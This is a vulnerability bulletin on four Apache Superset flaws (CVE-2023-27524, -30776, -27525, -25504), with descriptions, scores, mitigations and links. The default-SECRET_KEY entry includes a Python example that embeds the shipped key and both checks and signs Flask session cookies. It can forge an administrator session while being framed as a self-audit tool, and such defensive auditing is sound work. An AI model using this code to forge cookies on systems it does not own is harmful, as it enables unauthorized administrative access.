Risk | High |
Patch available | YES |
Number of vulnerabilities | 4 |
CVE-ID | CVE-2023-27524 CVE-2023-30776 CVE-2023-27525 CVE-2023-25504 |
CWE-ID | CWE-1188 CWE-200 CWE-862 CWE-918 |
Exploitation vector | Network |
Public exploit | Vulnerability #1 is being exploited in the wild. |
Vulnerable software | Apache Superset (Web applications / Other software) |
Vendor | Apache Foundation |
Security Bulletin
This security bulletin contains information about 4 vulnerabilities.
EUVDB-ID: #VU85166
Risk: High
CVSSv4.0: 9.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/U:Amber]
CVE-ID: CVE-2023-27524
CWE-ID:
CWE-1188 - Insecure Default Initialization of Resource
Exploit availability: Yes
Description
The vulnerability allows a remote attacker to gain unauthorized access to the application.
The vulnerability exists because Apache Superset ships with a default, publicly known Flask SECRET_KEY and does not replace it on its own. Superset uses this key to sign its session cookies, so on an installation that was not configured according to the vendor's instructions a remote attacker who knows the default key can forge a valid session cookie for any user, including an administrator, authenticate without credentials and access unauthorized resources.
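As an added example, not code from this bulletin or from the Superset project: the Python below re-implements the Flask session-cookie signing scheme that Superset inherits (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1) using only the standard library, so a session cookie copied from your own deployment can be checked offline against the shipped default SECRET_KEY. A match means the instance is affected by CVE-2023-27524. The default key literal is the one from superset/config.py; the sample session payload, timestamp and the `sign_session` helper exist only to construct test input and are assumptions of this example, not part of the advisory.

```python
"""Check whether a Flask/Superset session cookie validates under a known default SECRET_KEY.

Added example (not Superset project code). Re-implements what Flask's
SecureCookieSessionInterface does through itsdangerous, so no Superset
instance or third-party package is needed to run the check.
"""
import base64
import hashlib
import hmac
import json
import secrets
import zlib
from typing import Optional

# Default from superset/config.py, written with explicit escapes: "\2" and "\1"
# are octal escapes for 0x02 and 0x01, while "\e", "\y" and "\h" are kept
# literally by Python. Extend the list with placeholder keys from your own
# deployment templates if you have any.
SUPERSET_DEFAULT_SECRET_KEY = "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h"
KNOWN_DEFAULT_KEYS = [SUPERSET_DEFAULT_SECRET_KEY]

SESSION_SALT = b"cookie-session"  # Flask's fixed salt for the session cookie


def _b64(raw: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _derived_key(secret_key: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret_key, salt)."""
    return hmac.new(secret_key.encode("utf-8"), SESSION_SALT, hashlib.sha1).digest()


def sign_session(payload: dict, secret_key: str, timestamp: int) -> str:
    """Build a cookie in the Flask/itsdangerous format (here only to create test input)."""
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(body)
    # itsdangerous prefixes "." when the zlib form is shorter than the plain payload.
    value = b"." + _b64(compressed) if len(compressed) < len(body) - 1 else _b64(body)
    ts = _b64(timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big"))
    signed = value + b"." + ts
    sig = _b64(hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest())
    return (signed + b"." + sig).decode()


def verifies_with(cookie: str, secret_key: str) -> bool:
    """True if the cookie's signature is valid under secret_key (expiry is not checked)."""
    signed, sep, sig = cookie.encode().rpartition(b".")
    if not sep:
        return False
    try:
        given = _b64d(sig)
    except ValueError:
        return False
    expected = hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest()
    return hmac.compare_digest(expected, given)


def default_key_in_use(cookie: str) -> Optional[str]:
    """Return the default key the cookie validates under, or None if none match."""
    for key in KNOWN_DEFAULT_KEYS:
        if verifies_with(cookie, key):
            return key
    return None


def decode_payload(cookie: str) -> dict:
    """Decode the session payload without authenticating it (shows which user a cookie names)."""
    value = cookie.encode().rsplit(b".", 2)[0]
    raw = zlib.decompress(_b64d(value[1:])) if value.startswith(b".") else _b64d(value)
    return json.loads(raw)


# Constructed sample: the shape of a Flask-Login session for user id 1.
SAMPLE_SESSION = {"_user_id": "1", "_fresh": True}
SAMPLE_TIMESTAMP = 1_700_000_000


def demo() -> dict:
    """Sign the sample with the shipped default and with a random key, then check both."""
    vulnerable = sign_session(SAMPLE_SESSION, SUPERSET_DEFAULT_SECRET_KEY, SAMPLE_TIMESTAMP)
    hardened = sign_session(SAMPLE_SESSION, secrets.token_urlsafe(42), SAMPLE_TIMESTAMP)
    return {
        "vulnerable_cookie_matches_default": default_key_in_use(vulnerable) is not None,
        "hardened_cookie_matches_default": default_key_in_use(hardened) is not None,
        "payload": decode_payload(vulnerable),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

To audit a live instance, log in to your own Superset, copy the `session` cookie and pass it to `default_key_in_use`. The check needs nothing but the cookie, which is why the bulletin treats this as actively exploited: anyone who can reach the login page can perform the same verification and, with the key, sign a cookie of their own. Remediation is to set a unique SECRET_KEY in superset_config.py (the vendor documentation suggests generating one with `openssl rand -base64 42`); rotating the key invalidates existing sessions and requires re-encrypting the secrets stored in the metadata database, so follow the vendor's rotation procedure rather than editing the value in isolation.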
Mitigation
Install updates from vendor's website. Independently of the upgrade, set a unique, randomly generated SECRET_KEY in superset_config.py as the vendor's installation instructions require; an upgraded instance that still carries the default key remains exposed.
Vulnerable software versions
Apache Superset: 2.0.0 - 2.0.1
External links
https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk
https://www.openwall.com/lists/oss-security/2023/04/24/2
https://packetstormsecurity.com/files/172522/Apache-Superset-2.0.0-Authentication-Bypass.html
https://packetstormsecurity.com/files/175094/Apache-Superset-2.0.0-Remote-Code-Execution.html
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.
Is there known malware, which exploits this vulnerability?
Yes. This vulnerability is being exploited in the wild.
EUVDB-ID: #VU85965
Risk: Low
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear]
CVE-ID: CVE-2023-30776
CWE-ID:
CWE-200 - Information exposure
Exploit availability: No
Description
The vulnerability allows a remote user to gain access to potentially sensitive information.
The vulnerability exists due to excessive data output by the application. A remote user who holds specific data permissions can retrieve the stored passwords of database connections by requesting a specific REST API endpoint.
Mitigation
Install updates from vendor's website.
Vulnerable software versions
Apache Superset: 1.3.0 - 2.0.1
External links
https://lists.apache.org/thread/s9w9w10mt2sngk3solwnmq5k7md53tsz
https://www.openwall.com/lists/oss-security/2023/04/24/3
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
EUVDB-ID: #VU85964
Risk: Low
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear]
CVE-ID: CVE-2023-27525
CWE-ID:
CWE-862 - Missing Authorization
Exploit availability: No
Description
The vulnerability allows a remote user to gain access to sensitive information.
The vulnerability exists due to incorrect default permissions, which leave some non-trivial methods without an authorization check. A remote user holding only the Gamma role can use these methods to access metadata information.
Mitigation
Install updates from vendor's website.
Vulnerable software versions
Apache Superset: 2.0.0 - 2.0.1
External links
https://lists.apache.org/thread/wpv7b17zjg2pmvpfkdd6nn8sco8y2q77
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.
EUVDB-ID: #VU85963
Risk: Medium
CVSSv4.0: 1.3 [CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:U/U:Green]
CVE-ID: CVE-2023-25504
CWE-ID:
CWE-918 - Server-Side Request Forgery (SSRF)
Exploit availability: No
Description
The vulnerability allows a remote user to perform SSRF attacks.
The vulnerability exists due to insufficient validation of user-supplied input within the import dataset feature. A remote authenticated user with the permissions needed to import datasets can send a specially crafted HTTP request and trick the application into initiating requests to arbitrary systems on behalf of the server.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive data located in the local network, or to send malicious requests to other servers from the vulnerable system.
Mitigation
Install updates from vendor's website.
Vulnerable software versions
Apache Superset: 2.0.0 - 2.0.1
External links
https://lists.apache.org/thread/tdnzkocfsqg2sbbornnp9g492fn4zhtx
https://www.openwall.com/lists/oss-security/2023/04/18/8
Q & A
Can this vulnerability be exploited remotely?
Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.
Is there known malware, which exploits this vulnerability?
No. We are not aware of malware exploiting this vulnerability.